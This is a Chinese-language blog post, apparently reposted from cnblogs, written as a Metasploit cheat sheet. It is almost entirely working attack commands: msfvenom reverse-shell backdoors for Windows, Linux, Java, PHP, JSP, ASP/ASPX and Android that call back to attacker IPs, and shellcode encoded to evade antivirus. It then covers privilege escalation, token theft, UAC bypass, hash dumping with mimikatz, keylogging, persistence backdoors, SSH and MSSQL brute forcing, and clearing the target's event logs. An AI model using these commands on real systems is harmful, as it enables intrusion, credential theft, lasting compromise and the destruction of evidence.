zoukankan      html  css  js  c++  java
  • Metasploit之多种后门生成

    本章节的后门有以下几种

    windows    -->使用模块“windows/meterpreter/reverse_tcp”
    命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe
    参考“09-Metasploit之我的远程控制软件”


    linux      -->使用模块“linux/x86/meterpreter/shell_rverse_tcp”
    命令:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 X >text
    参考文章:http://xiao106347.blog.163.com/blog/static/215992078201310253172937/


    java       -->使用模块“java/meterpreter/reverse_tcp”
    命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 W >text.jar



    php        -->使用模块“php/meterpreter/reverse_tcp”
    命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php
    参考文章:http://www.111cn.net/phper/phpanqn/101228.htm


    jsp        -->使用模块“java/jsp_shell_reverse_tcp”
    命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.jsp
    参考文章:http://netsecurity.51cto.com/art/201406/442648.htm


    asp        -->使用模块“windows/meterpreter/reverse_tcp”
    命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp
    参考文章:http://www.ithao123.cn/content-10813776.html


    aspx       -->使用模块“windows/meterpreter/reverse_tcp”
    命令:msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
    参考文章:http://www.ithao123.cn/content-10813776.html


    android    -->使用模块“android/meterpreter/reverse_tcp”
    命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk
    参考“13-Metasploit之渗透安卓实战”


    反弹连接的访问:
    use exploit/multi/handler
    set PAYLOAD <Payload name>
    set LHOST <LHOST value>
    set LPORT <LPORT value>
    set ExitOnSession false
    exploit -j -z

    ------------------------------------------------------------------------------------------------
    Metasploit-web渗透
    参考文献:http://www.ithao123.cn/content-10813776.html

    首先用Metasploit生成反弹马,也就是生成反弹的payload:
    成功生成反弹型payload:
    (1)
    生成win下的exe
    msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe 

    (2)
    生成win下的aspx
    msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
    其他的生成payload 的方法见:http://netsec.ws/?p=331

    (3)
    我生成一个aspx的反弹马

    然后启动msfconsole

     (4)
    本地监听,反弹后的控制端:use exploit/multi/handler

    (5)
    本地监听的确定用哪个payload:
    set payload windows/meterpreter/reverse_tcp

    (6)
    设置本地监听的端口:
    set lport 7788

    (7)
    设置本地的监听的地址:
    set lhost 0.0.0.0

    (8)
    运行:
    run

    (9)
    访问生成的反弹马:
    http://xxx.xxx.xx.xxx:/back.aspx

    得到meterpreter的shell

    • payload的几个常用生成

    1. 生成windows下的反弹木马

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe
      // -p < payload > -f < format> -o < path> = >

    2. 监听

      use exploit/multi/handler
      set PAYLOAD windows/meterpreter/reverse_tcp
      set LHOST 172.17.150.246 //阿里云云服务器这里是内网ip
      set LPORT 8888
      exploit -j

    3. PHP:

      msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php
      use exploit/multi/handler
      set PAYLOAD php/meterpreter_reverse_tcp
      set LHOST 172.17.150.246
      set LPORT 8888
      exploit -j

    4. shellcode:

      msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60.205.212.140 -e x86/shikata_ga_nai -i 11 -f py > 1.py //-e 使用编码 -i 编码次数


    • 内网代理

    1. 首先需要链接sessions,在此基础下添加路由

      meterpreter > run get_local_subnets //获取网段
      meterpreter > run autoroute -s 172.2.175.0/24 //添加路由
      meterpreter > run autoroute -p //查看路由
      meterpreter > run autoroute -d -s 172.2.175.0 //删除网段
      meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探测该网段下的存活主机。
      meterpreter > background //后台sessions


    • 提权

    1. getsystem

      meterpreter > getsystem //直getsystem提权,最常用简单的办法

    2. 使用exp提权

      meterpreter > background //先后台运行会话
      [*] Backgrounding session 1…
      msf > use post/windows/escalate/ms10_073_kbdlayout
      msf > show options
      msf > set session 1 //设置要使用的会话
      msf post(ms10_073_kbdlayout) > exploit
      注意:如果创建了一个system进程,就可以立马sessions 1进入会话,然后ps查看进程,使用migrate pid注入到进程。
      或者直接:
      meterpreter > run post/windows/escalate/ms10_073_kbdlayout

    3.盗取令牌

    meterpreter > use incognito //进入这个模块
    meterpreter > list_tokens –u //查看存在的令牌
    meterpreter > impersonate_token NT AUTXXXXSYSTEM //令牌是DelegationTokens一列,getuid查看,两个斜杠

    注:只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌,一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的,建好的账户没有这个权限。使用菜刀(IIS服务器权限)反弹meterpreter是服务型权限。

    4.Bypassuac

    msf > use exploit/windows/local/bypassuac //32位与64位一样,其他几个模块也一样
    msf > show options
    msf > set session 4
    msf > run //成功后会返回一个新的session,进入新会话,发现权限没变,使用getsystem即可完成提权

    5.Hash

    meterpreter > run post/windows/gather/smart_hashdump //读取hash这种做法最智能,效果最好。


    • 建立持久后门

    1. 服务启动后门:

      meterpreter > run metsvc -A //再开起一个终端,进入msfconsole
      msf > use exploit/multi/handler //新终端中监听
      msf > set payload windows/metsvc_bind_tcp
      msf > set LPORT 31337
      msf > set RHOST 192.168.0.128
      msf > run //获取到的会话是system权限

    2. 启动项启动后门

      meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105

      // -X 系统开机自启,-i 10 10秒重连一次,-p 监听端口,-r 监听机。直接监听就好了,他自己会链接回来。
      注意到移除 persistence 后门的办法是删除 HKLMSoftwareMicrosoftWindowsCurrentVersionRun 中的注册表键和 C:WINDOWSTEMP 中的 VBScript 文件。
      缺点:容易被杀毒软件杀 。

    这两个后门有个弊端,在进程中都会存在服务名称为meterpreter的进程。


    • 漏洞扫描

    1. 对端口都扫描

      use auxiliary/scanner/portscan/tcp
      show options
      set rhosts 192.168.2.1-255
      set ports 21,22,25,443,445,1433,3306
      set threads 20
      exploit

    2. mssql开发利用

      1. 对各个ip是否有mssql服务的探测
        use scanner/mssql/mssql_ping //测试MSSQL的存在和信息
        show options
        set rhosts 192.168.2.1-255
        set threads 30
        exploit
      2. 对扫描到的ip进行爆破
        use scanner/mssql/mssql_login //具体配置show options。
      3. sa权限对其利用
        use admin/mssql/mssql_exec
        set rhost 192.168.2.10
        set password sa
        set CMD cmd.exe /c echo hello
        exploit
    3. mysql开放利用

    4. 爆破ssh模块:

      use auxiliary/scanner/ssh/ssh_login
      set rhosts 7.7.7.20
      set username root
      set pass_file /root/pass.txt //加载字典,可以收集密码做字典
      set threads 50
      run

    5. 通过nmap扫描基本漏洞:

      msf > nmap –script=vuln 受害靶机ip地址
      msf > nmap –script=mysql-info 192.168.0.4 //扫描mysql数据库信息 版本 等..

    最后清除记录

    msf > clearev //删除目标机上的应用程序、系统和安全日志。


    一些常用命令

    查看系统命令 sysinfo

    截图 screenshot

    查看是否是虚拟机 run checkvm

    查看运行木马的用户 getuid

    注入到进程 migrate pid //成功会提示successfully

    加载mimikatz模块 meterpreter > load mimikatz meterpreter > wdigest //需要system权限

    获取键盘记录:meterpreter> run post/windows/capture/keylog_recorder #运行键盘记录模块,他自己创建本文。

  • 相关阅读:
    java链接linux服务器,命令操作
    linux中php项目无法发送邮件:PEAR mail package is not installed
    linux下部署php项目-Apache、php、mysql关联
    MyEclipse黑色主题
    MyEclipse优化-六步攻略
    致产品
    万物归宗
    【产品渗透:移动端平台与纯应用APP产品的相互嵌入】
    【异类--一万小时定律】
    【活法】
  • 原文地址:https://www.cnblogs.com/0x03/p/7451281.html
Copyright © 2011-2022 走看看